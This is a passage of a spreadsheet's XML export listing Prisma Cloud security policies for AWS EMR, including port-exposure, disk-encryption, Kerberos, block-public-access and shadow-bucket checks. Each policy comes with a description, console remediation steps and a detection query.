      </c>
      <c r="K1920" t="inlineStr">
        <is>
          <t>AWS EMR cluster Master Security Group allows all traffic to port 8088</t>
        </is>
      </c>
      <c r="L1920" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1920" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1920" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1920" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1920" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1920" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R1920" t="inlineStr">
        <is>
          <t>ISM-1006</t>
        </is>
      </c>
      <c r="S1920" t="inlineStr"/>
      <c r="T1920" t="b">
        <v>0</v>
      </c>
      <c r="U1920" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1920" t="inlineStr">
        <is>
          <t>aws-emr-describe-cluster</t>
        </is>
      </c>
      <c r="W1920" t="inlineStr">
        <is>
          <t>This policy identifies AWS EMR cluster which has Master Security Group which allows all traffic to port 8088. Exposing port 8088 to all traffic exposes web interfaces of the master node of an EMR Cluster. This configuration is highly susceptible to EMR cluster hijacking attacks. It is highly recommended limiting the access for the EMR cluster attached Master Security Group to your IP only or configure SSH Tunnel.</t>
        </is>
      </c>
      <c r="X1920" t="inlineStr">
        <is>
          <t>Before making any changes, please check the impact to your applications/services.
1. Log in to the AWS Console
2. Select Clusters in left side pane
3. Select the EMR Cluster reported in the alert
4. Select the Security groups for Master link under Security and access
5. Choose ElasticMapReduce-master from the list 
6. Click on the 'Inbound Rule'
7. Delete the rule which has 'Source' value as 0.0.0.0/0 or ::/0 and 'Port Range' value as 8088 (or range containing 8088)</t>
        </is>
      </c>
      <c r="Y1920" t="inlineStr"/>
      <c r="Z1920" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-emr-describe-cluster' AND json.rule = status.state does not contain TERMINATING as X; config from cloud.resource where api.name= 'aws-ec2-describe-security-groups' AND json.rule = isShared is false and (ipPermissions[?any((ipRanges[*] contains 0.0.0.0/0 or ipv6Ranges[*].cidrIpv6 contains ::/0) and ((toPort == 8088 or fromPort == 8088) or (toPort &gt; 8088 and fromPort &lt; 8088)))] exists) as Y; filter '$.X.ec2InstanceAttributes.emrManagedMasterSecurityGroup equals $.Y.groupId or $.X.ec2InstanceAttributes.additionalMasterSecurityGroups[*] contains $.Y.groupId'; show X;</t>
        </is>
      </c>
      <c r="AA1920" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1920" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1920" t="inlineStr">
        <is>
          <t>PC-AWS-EMR-787</t>
        </is>
      </c>
      <c r="AD1920" t="b">
        <v>1</v>
      </c>
      <c r="AE1920" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1920" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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0" t="inlineStr">
        <is>
          <t>4351322d-9efe-4ac5-88e6-9de1bcdf4bb5</t>
        </is>
      </c>
      <c r="AI1920" t="inlineStr">
        <is>
          <t>2859647d-1a90-4153-b9dc-8211817ab3d4</t>
        </is>
      </c>
      <c r="AJ1920" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1920" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1921">
      <c r="A1921" t="inlineStr">
        <is>
          <t>HIPAA, CSA CCM v.4.0.1, CSA CCM v4.0.12, APRA (CPS 234) Information Security, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, GDPR, APRA (CPS 234) Information Security, NIST SP 800-172, ISO/IEC 27001:2022, Risk Management in Technology (RMiT), PCI DSS v3.2.1, NIST SP 800-171 Revision 2, ISO/IEC 27001:2022, HITRUST v.9.4.2 [Deprecated], APRA (CPS 234) Information Security, ISO/IEC 27002:2013, Fedramp (Moderate), MLPS 2.0 (Level 2), ISO/IEC 27002:2013, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), NYDFS 23 CRR-NY 500.0, NIST 800-53 Rev 5, NIST CSF, HITRUST CSF v.11.2.0, Fedramp (Moderate), ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.1.02, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, NIST 800-53 Rev 5, NIST 800-53 Rev4, HITRUST v.9.4.2 [Deprecated], CyberSecurity Law of the People's Republic of China, jneytchev-fedramp-low, Fedramp (Low), ISO/IEC 27017:2015, NIST SP 800-171 Revision 3, GDPR, Microsoft Cloud Security Benchmark v1, DORA, ISO/IEC 27002:2013, ISO/IEC 27002:2013, NIST 800-53 Rev4, CDC NIST 800-53 Rev4, Risk Management in Technology (RMiT), MLPS 2.0, NIST 800-53 Rev4, MAS TRM 2021, CyberSecurity Law of the People's Republic of China, ISO/IEC 27017:2015, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, CDC NIST 800-53 Rev4, Sarbanes Oxley Act (SOX), APRA (CPS 234) Information Security, NIST CSF, TX-RAMP Level 1, NIST SP 800-171 Revision 3, Cybersecurity Maturity Model Certification (CMMC) v.1.02, SOC 2, HIPAA, Fedramp (Moderate), Risk Management in Technology (RMiT), ISO/IEC 27002:2013, NIST SP 800-172, NYDFS 23 CRR-NY 500.0, APRA (CPS 234) Information Security, CCPA 2018, MAS TRM 2021, PIPEDA, CDC NIST 800-53 Rev4, Brazilian Data Protection Law (LGPD), Secure Controls Framework (SCF) - 2024.2, CyberSecurity Law of the People's Republic of China, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.1.02, CSA CCM v.4.0.1, Cybersecurity Maturity Model Certification (CMMC) v.1.02, PCI DSS v3.2.1, NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B1921" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1921" s="2" t="inlineStr"/>
      <c r="D1921" t="inlineStr"/>
      <c r="E1921" t="inlineStr"/>
      <c r="F1921" t="inlineStr"/>
      <c r="G1921" t="b">
        <v>1</v>
      </c>
      <c r="H19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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1921" t="inlineStr">
        <is>
          <t>aws-emr</t>
        </is>
      </c>
      <c r="K1921" t="inlineStr">
        <is>
          <t>AWS EMR cluster is not enabled with local disk encryption using Custom key provider</t>
        </is>
      </c>
      <c r="L1921" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M1921" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1921" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1921" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1921" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1921" t="inlineStr">
        <is>
          <t>AC-1</t>
        </is>
      </c>
      <c r="R1921" t="inlineStr">
        <is>
          <t>AC-17 (2)</t>
        </is>
      </c>
      <c r="S1921" t="inlineStr"/>
      <c r="T1921" t="b">
        <v>0</v>
      </c>
      <c r="U1921" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1921" t="inlineStr">
        <is>
          <t>aws-emr-describe-cluster</t>
        </is>
      </c>
      <c r="W1921" t="inlineStr">
        <is>
          <t>This policy identifies AWS EMR clusters that are not enabled with local disk encryption using Custom key provider. Applications using the local file system on each cluster instance for intermediate data throughout workloads, where data could be spilled to disk when it overflows memory. With Local disk encryption at place, data at rest can be protected.</t>
        </is>
      </c>
      <c r="X1921" t="inlineStr">
        <is>
          <t>1. Login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Under 'Local disk encryption', check the box 'Enable at-rest encryption for local disks'.
8. Select 'Custom' Key provider type from the 'Key provider type' dropdown list.
9. Follow the below link for creating the custom key,
https://docs.aws.amazon.com/emr/latest/ManagementGuide/emr-data-encryption-options.html
10. Click on 'Create' button.
11. On the left menu of EMR dashboard Click 'Clusters'.
12. Select the EMR cluster for which the alert has been generated and click on the 'Clone' button from the top menu.
13. In the Cloning popup, choose 'Yes' and Click 'Clone'.
14. On the Create Cluster page, in the Security Options section, click on 'security configuration'.
15. From the 'Security configuration' drop down select the name of the security configuration created at step 4 to step 8, click 'Create Cluster'.
16. Once the new cluster is set up verify its working and terminate the source cluster.
17. On the left menu of EMR dashboard Click 'Clusters', from the list of clusters select the source cluster which is alerted.
18. Click on the 'Terminate' button from the top menu.
19. On the 'Terminate clusters' pop-up, click 'Terminate'.</t>
        </is>
      </c>
      <c r="Y1921" t="inlineStr"/>
      <c r="Z1921" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-emr-describe-cluster' as X; config from cloud.resource where api.name = 'aws-emr-security-configuration' as Y; filter '($.X.status.state does not contain TERMINATING) and ($.X.securityConfiguration equals $.Y.name) and ($.Y.EncryptionConfiguration.AtRestEncryptionConfiguration.LocalDiskEncryptionConfiguration exists and $.Y.EncryptionConfiguration.AtRestEncryptionConfiguration.LocalDiskEncryptionConfiguration.EncryptionKeyProviderType does not equal Custom)' ; show X;</t>
        </is>
      </c>
      <c r="AA1921" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1921" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1921" t="inlineStr">
        <is>
          <t>PC-AWS-EMR-426</t>
        </is>
      </c>
      <c r="AD1921" t="b">
        <v>1</v>
      </c>
      <c r="AE1921" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1921" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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1" t="inlineStr">
        <is>
          <t>41844ca6-5843-4889-8807-12a0d6e963d7</t>
        </is>
      </c>
      <c r="AI1921" t="inlineStr">
        <is>
          <t>34ddf7e6-23a5-42ce-934a-404ab284297c</t>
        </is>
      </c>
      <c r="AJ1921" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1921" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1922">
      <c r="A1922" t="inlineStr">
        <is>
          <t>TX-RAMP Level 2, HIPAA, Copy of ACSC Information Security Manual (ISM)-clone, CSA CCM v.4.0.1, CHC HITRUST CSF v.9.6.0, HITRUST CSF v.9.6.0, CIS Controls v8, ISO/IEC 27001:2022, ISO/IEC 27017:2015, APRA (CPS 234) Information Security, CSA CCM v.4.0.6, MLPS 2.0 (Level 3), Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, NIST CSF, CSA CCM v.4.0.6, NIST SP 800-171 Revision 2, MLPS 2.0 (Level 3), NYDFS 23 CRR-NY 500.0, HITRUST CSF v.9.6.0, ISO 27002:2022, CHC HITRUST CSF v.9.6.0, ISO/IEC 27002:2013, CSA CCM v.4.0.1, ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, NIST 800-53 Rev4, APRA (CPS 234) Information Security, CDC NIST 800-53 Rev4, ISO/IEC 27002:2013, TX-RAMP Level 1, MLPS 2.0, ISO/IEC 27002:2013, CSA CCM v4.0.12, ISO/IEC 27002:2013, Telecommunications Security Act - TSA, HITRUST CSF v.9.6.0, MAS TRM 2021, CSA CCM v4.0.12, MAS TRM 2021, CIS Controls v7.1, CSA CCM v.4.0.1, CSA CCM v.4.0.6, ISO/IEC 27018:2019, CyberSecurity Law of the People's Republic of China, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST 800-53 Rev 5, CSA CCM v.4.0.1, CSA CCM v.4.0.6, ISO 27002:2022, SOC 2, HITRUST CSF v.11.2.0, ISO/IEC 27017:2015, HITRUST v.9.4.2 [Deprecated], ISO/IEC 27001:2022, CSA CCM v.4.0.1, Telecommunications Security Act - TSA, Cybersecurity Maturity Model Certification (CMMC) v.1.02, ISO/IEC 27002:2013, CIS Controls v7.1, ISO/IEC 27002:2013, CSA CCM v4.0.12, Insurance Regulatory And Development Authority Of India, TX-RAMP Level 2, ISO/IEC 27002:2013, kashan ACSC Information Security Manual (ISM), Australian Energy Sector Cyber Security Framework (AESCSF), Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), FFIEC, Korea – Information Security Management System (ISMS), Copy of CIS Controls v8, NYDFS 23 CRR-NY 500.0, CSA CCM v.4.0.1, ISO/IEC 27017:2015, CHC HITRUST CSF v.9.6.0, DORA, MLPS 2.0, APRA (CPS 234) Information Security, TX-RAMP Level 1, CSA CCM v.4.0.1, RBI Baseline Cyber Security and Resilience Requirements, ISO/IEC 27018:2019, HIPAA, CSA CCM v.4.0.6, ISO/IEC 27001:2022, PCI DSS v3.2.1, CSA CCM v4.0.12, NIST SP 800-172, ISO/IEC 27001:2022, CIS Controls v8.1, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, CSA CCM v4.0.12, ITSG-33, PCI DSS v4.0, Brazilian Data Protection Law (LGPD), NIST SP 800-171 Revision 3, ISO/IEC 27002:2013, Sarbanes Oxley Act (SOX), ISO 27002:2022, MLPS 2.0 (Level 2), CSA CCM v.4.0.1, CSA CCM v.4.0.1, kfirdaus AWS Account-CS, Secure Controls Framework (SCF) - 2022.2.1, Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B1922" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1922" s="2" t="inlineStr"/>
      <c r="D1922" t="inlineStr"/>
      <c r="E1922" t="inlineStr"/>
      <c r="F1922" t="inlineStr"/>
      <c r="G1922" t="b">
        <v>1</v>
      </c>
      <c r="H19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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1922" t="inlineStr">
        <is>
          <t>aws-emr</t>
        </is>
      </c>
      <c r="K1922" t="inlineStr">
        <is>
          <t>AWS EMR cluster is not configured with Kerberos Authentication</t>
        </is>
      </c>
      <c r="L1922" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1922" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1922" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1922" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1922" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q1922" t="inlineStr">
        <is>
          <t>Guidelines for System Hardening</t>
        </is>
      </c>
      <c r="R1922" t="inlineStr">
        <is>
          <t>ISM-1603</t>
        </is>
      </c>
      <c r="S1922" t="inlineStr"/>
      <c r="T1922" t="b">
        <v>0</v>
      </c>
      <c r="U1922" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1922" t="inlineStr">
        <is>
          <t>aws-emr-describe-cluster</t>
        </is>
      </c>
      <c r="W1922" t="inlineStr">
        <is>
          <t>This policy identifies EMR clusters which are not configured with Kerberos Authentication. Kerberos uses secret-key cryptography to provide strong authentication so that passwords or other credentials aren't sent over the network in an unencrypted format.</t>
        </is>
      </c>
      <c r="X1922" t="inlineStr">
        <is>
          <t>1. Log in to the AWS Console
2. In the console, select the specific region from region drop down on the top right corner, for which the alert is generated
3. Navigate to 'EMR' dashboard from 'Services' dropdown
4. Go to 'Security configurations', click 'Create'
5. On the Create security configuration window,
6. In 'Name' box, provide a name for the new EMR security configuration
7. Under the section 'Enable Kerberos authentication' select the check box
8. Follow below link for configuration steps,
https://docs.aws.amazon.com/emr/latest/ManagementGuide/emr-kerberos.html
9. Click on 'Create' button
10. On the left menu of EMR dashboard Click 'Clusters'
11. Select the EMR cluster for which the alert has been generated and click on the 'Clone' button from the top menu
12. In the Cloning popup, choose 'Yes' and Click 'Clone'
13. On the Create Cluster page, in the Security Options section, click on 'security configuration'.
14. From the 'Security configuration' drop down select the name of the security configuration created at step 4 to step 8, click 'Create Cluster'
15. Once you the new cluster is set up verify its working and terminate the source cluster in order to stop incurring charges for it.
16. On the left menu of EMR dashboard Click 'Clusters', from the list of clusters select the source cluster which is alerted
17. Click on the 'Terminate' button from the top menu
18. On the 'Terminate clusters' pop-up, click 'Terminate'. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-that-emr-clusters-have-kerberos-enabled
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-that-emr-clusters-have-kerberos-enabled</t>
        </is>
      </c>
      <c r="Y1922" t="inlineStr"/>
      <c r="Z1922" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-emr-describe-cluster' as X; config from cloud.resource where api.name = 'aws-emr-security-configuration' as Y; filter '($.X.status.state does not contain TERMINATING) and ($.X.securityConfiguration contains $.Y.name) and ($.Y.AuthenticationConfiguration.KerberosConfiguration does not exist)' ; show X;
{"category":"General","resourceTypes":["aws_emr_cluster"]}</t>
        </is>
      </c>
      <c r="AA1922" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1922" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1922" t="inlineStr">
        <is>
          <t>PC-AWS-EMR-425-CKV_AWS_114</t>
        </is>
      </c>
      <c r="AD1922" t="b">
        <v>1</v>
      </c>
      <c r="AE1922" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1922" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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2" t="inlineStr">
        <is>
          <t>5e2afd31-8a97-489b-a3ea-0378a29ce76a</t>
        </is>
      </c>
      <c r="AI1922" t="inlineStr">
        <is>
          <t>0ac889c6-a0e6-45f1-bb4e-ae3544b59d8c</t>
        </is>
      </c>
      <c r="AJ1922" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1922" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1923">
      <c r="A1923" t="inlineStr">
        <is>
          <t>kfirdaus AWS Account-CS, PCI DSS v4.0, ISO/IEC 27001:2022, Copy of ACSC Information Security Manual (ISM)-clone, RBI Baseline Cyber Security and Resilience Requirements, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, NYDFS 23 CRR-NY 500.0, ISO 27002:2022, Copy of ACSC Information Security Manual (ISM)-clone, Microsoft Cloud Security Benchmark v1, ACSC Information Security Manual (ISM), ISO/IEC 27001:2022, ISO 27002:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), Secure Controls Framework (SCF) - 2022.2.1, kashan ACSC Information Security Manual (ISM), Copy of ACSC Information Security Manual (ISM)-clone, CIS Controls v8.1, ISO 27002:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), HITRUST CSF v.11.2.0, kashan ACSC Information Security Manual (ISM), TX-RAMP Level 2, kfirdaus AWS Account-CS, Secure Controls Framework (SCF) - 2024.2, SOC 2, TX-RAMP Level 1, PCI DSS v4.0, Copy of ACSC Information Security Manual (ISM)-clone, PCI DSS v4.0, PCI DSS v4.0, MLPS 2.0 (Level 2), CIS Controls v8, NIST 800-53 Rev 5, ISO/IEC 27001:2022, NYDFS 23 CRR-NY 500.0, kfirdaus AWS Account-CS, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, ISO/IEC 27001:2022, Secure Controls Framework (SCF) - 2024.2, Sarbanes Oxley Act (SOX), kashan ACSC Information Security Manual (ISM), CIS Controls v7.1, Secure Controls Framework (SCF) - 2022.2.1, ITSG-33, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), CHC HITRUST CSF v.9.6.0, GDPR, ISO 27002:2022, Copy of CIS Controls v8, SOC 2, HITRUST CSF v.9.6.0, kashan ACSC Information Security Manual (ISM), PCI DSS v4.0, ACSC Information Security Manual (ISM), ACSC Information Security Manual (ISM), TX-RAMP Level 2, ISO/IEC 27001:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), ACSC Information Security Manual (ISM), CHC HITRUST CSF v.9.6.0, kfirdaus AWS Account-CS, PCI DSS v4.0, HITRUST CSF v.9.6.0</t>
        </is>
      </c>
      <c r="B1923" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1923" s="2" t="inlineStr"/>
      <c r="D1923" t="inlineStr"/>
      <c r="E1923" t="inlineStr"/>
      <c r="F1923" t="inlineStr"/>
      <c r="G1923" t="b">
        <v>1</v>
      </c>
      <c r="H19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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1923" t="inlineStr">
        <is>
          <t>aws-emr</t>
        </is>
      </c>
      <c r="K1923" t="inlineStr">
        <is>
          <t>AWS EMR Block public access setting disabled</t>
        </is>
      </c>
      <c r="L1923" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1923" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1923" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1923" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1923" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1923" t="inlineStr">
        <is>
          <t>Guidelines for Personnel Security</t>
        </is>
      </c>
      <c r="R1923" t="inlineStr">
        <is>
          <t>ISM-0854</t>
        </is>
      </c>
      <c r="S1923" t="inlineStr"/>
      <c r="T1923" t="b">
        <v>0</v>
      </c>
      <c r="U1923" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1923" t="inlineStr">
        <is>
          <t>aws-emr-public-access-block</t>
        </is>
      </c>
      <c r="W1923" t="inlineStr">
        <is>
          <t>This policy identifies AWS EMR which has a disabled block public access setting. AWS EMR block public access prevents a cluster in a public subnet from launching when any security group associated with the cluster has a rule that allows inbound traffic from the internet, unless the port has been specified as an exception. It is recommended to enable AWS EMR Block public access in each AWS Region for your AWS account.</t>
        </is>
      </c>
      <c r="X1923" t="inlineStr">
        <is>
          <t>Refer to the following URL to configure AWS EMR Block public access:
https://docs.aws.amazon.com/emr/latest/ManagementGuide/emr-block-public-access.html</t>
        </is>
      </c>
      <c r="Y1923" t="inlineStr"/>
      <c r="Z1923" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-emr-public-access-block' AND json.rule = blockPublicAccessConfiguration.blockPublicSecurityGroupRules is false</t>
        </is>
      </c>
      <c r="AA1923" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1923" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1923" t="inlineStr">
        <is>
          <t>PC-AWS-EMR-788</t>
        </is>
      </c>
      <c r="AD1923" t="b">
        <v>1</v>
      </c>
      <c r="AE1923" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1923" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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3" t="inlineStr">
        <is>
          <t>0bcfdab2-31d8-4dc9-a91c-42c7a7242e01</t>
        </is>
      </c>
      <c r="AI1923" t="inlineStr">
        <is>
          <t>ed938bd1-5868-4603-a0d9-ad5ca338276d</t>
        </is>
      </c>
      <c r="AJ1923" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1923" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1924">
      <c r="A1924" t="inlineStr"/>
      <c r="B1924" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1924" s="2" t="inlineStr"/>
      <c r="D1924" t="inlineStr"/>
      <c r="E1924" t="inlineStr"/>
      <c r="F1924" t="inlineStr"/>
      <c r="G1924" t="b">
        <v>1</v>
      </c>
      <c r="H19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24" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1924" t="inlineStr">
        <is>
          <t>aws-emr</t>
        </is>
      </c>
      <c r="K1924" t="inlineStr">
        <is>
          <t>AWS EMR Studio using the shadow resource bucket for workspace storage</t>
        </is>
      </c>
      <c r="L1924" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1924" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1924" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1924" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1924" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1924" t="inlineStr"/>
      <c r="R1924" t="inlineStr"/>
      <c r="S1924" t="inlineStr"/>
      <c r="T1924" t="b">
        <v>0</v>
      </c>
      <c r="U1924" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1924" t="inlineStr">
        <is>
          <t>aws-emr-studio</t>
        </is>
      </c>
      <c r="W1924" t="inlineStr">
        <is>
          <t>This policy identifies that the AWS EMR Studio using the bucket for workspace storage is not managed from the current account. This could potentially be using the shadow resource bucket for workspace storage.
AWS EMR enables data processing and analysis using big data frameworks like Hadoop, Spark, and Hive. To create an EMR Studio, the EMR service automatically generates an S3 bucket. This S3 bucket follows the naming pattern 'aws-emr-studio-{Account-ID}-{Region}'. An attacker can create an unclaimed bucket with this predictable name and wait for the victim to deploy a new EMR Studio in a new region. This can result in multiple attacks, including cross-site scripting (XSS) when the user opens the compromised notebook in EMR Studio.
It is recommended to verify the expected bucket owner and update the AWS EMR storage location and enforce the aws: ResourceAccount condition in the policy of the service role used by the AWS EMR to check that the AWS account ID of the S3 bucket used by AWS EMR Studio according to your business requirements.</t>
        </is>
      </c>
      <c r="X1924" t="inlineStr">
        <is>
          <t>To update an EMR Studio with the new workspace storage, Follow the below actions:
1. Sign in to the AWS Management Console
2. Move the required script to a new S3 bucket as per your requirements.
3. Open the Amazon EMR console at https://console.aws.amazon.com/emr.
4. Under EMR Studio on the left navigation, choose Studios.
5. Select the reported studio from the Studios list and Click the 'Edit' button on the right corner to edit the Studio details.
6. Verify that the 'Workspace storage' is authorized and managed according to your business requirements. 
7. On the Edit studio page, Update 'Workspace storage' by selecting 'Browse S3', and select the 'Encrypt Workspace files with your own AWS KMS key' as per your organisation's requirements.
8. Click 'Save Changes'.</t>
        </is>
      </c>
      <c r="Y1924" t="inlineStr"/>
      <c r="Z1924" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-emr-studio' AND json.rule = DefaultS3Location exists and DefaultS3Location contains "aws-emr-studio-" as X; config from cloud.resource where api.name = 'aws-s3api-get-bucket-acl' AND json.rule = bucketName contains "aws-emr-studio-" as Y; filter 'not ($.X.BucketName equals $.Y.bucketName)' ; show X;</t>
        </is>
      </c>
      <c r="AA1924" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1924" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1924" t="inlineStr">
        <is>
          <t>PC-AWS-EMR-1298</t>
        </is>
      </c>
      <c r="AD1924" t="b">
        <v>1</v>
      </c>
      <c r="AE1924" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1924" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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24" t="inlineStr">
        <is>
          <t>4e31737b-5f01-4afc-85d4-80f44a26f4ec</t>
        </is>
      </c>
      <c r="AI1924" t="inlineStr">
        <is>
          <t>20ef3761-6c1f-40bb-af5d-fea69c20fa89</t>
        </is>
      </c>
      <c r="AJ1924" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1924" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1925">
      <c r="A1925" t="inlineStr">
        <is>
          <t>kfirdaus AWS Account-CS, ISO/IEC 27001:2022, APRA (CPS 234) Information Security, Copy of ACSC Information Security Manual (ISM)-clone, Cybersecurity Maturity Model Certification (CMMC) v.1.02, MLPS 2.0, HIPAA, RBI Baseline Cyber Security and Resilience Requirements, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, NYDFS 23 CRR-NY 500.0, ISO 27002:2022, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, Copy of ACSC Information Security Manual (ISM)-clone, MITRE ATT&amp;CK v8.2 [Deprecated], HITRUST v.9.4.2 [Deprecated], TX-RAMP Level 2, APRA (CPS 234) Information Security, ACSC Information Security Manual (ISM), ISO/IEC 27001:2022, ISO 27002:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), Secure Controls Framework (SCF) - 2022.2.1, kashan ACSC Information Security Manual (ISM), PCI DSS v4.0, MITRE ATT&amp;CK v10.0 [Deprecated], Copy of ACSC Information Security Manual (ISM)-clone, ISO 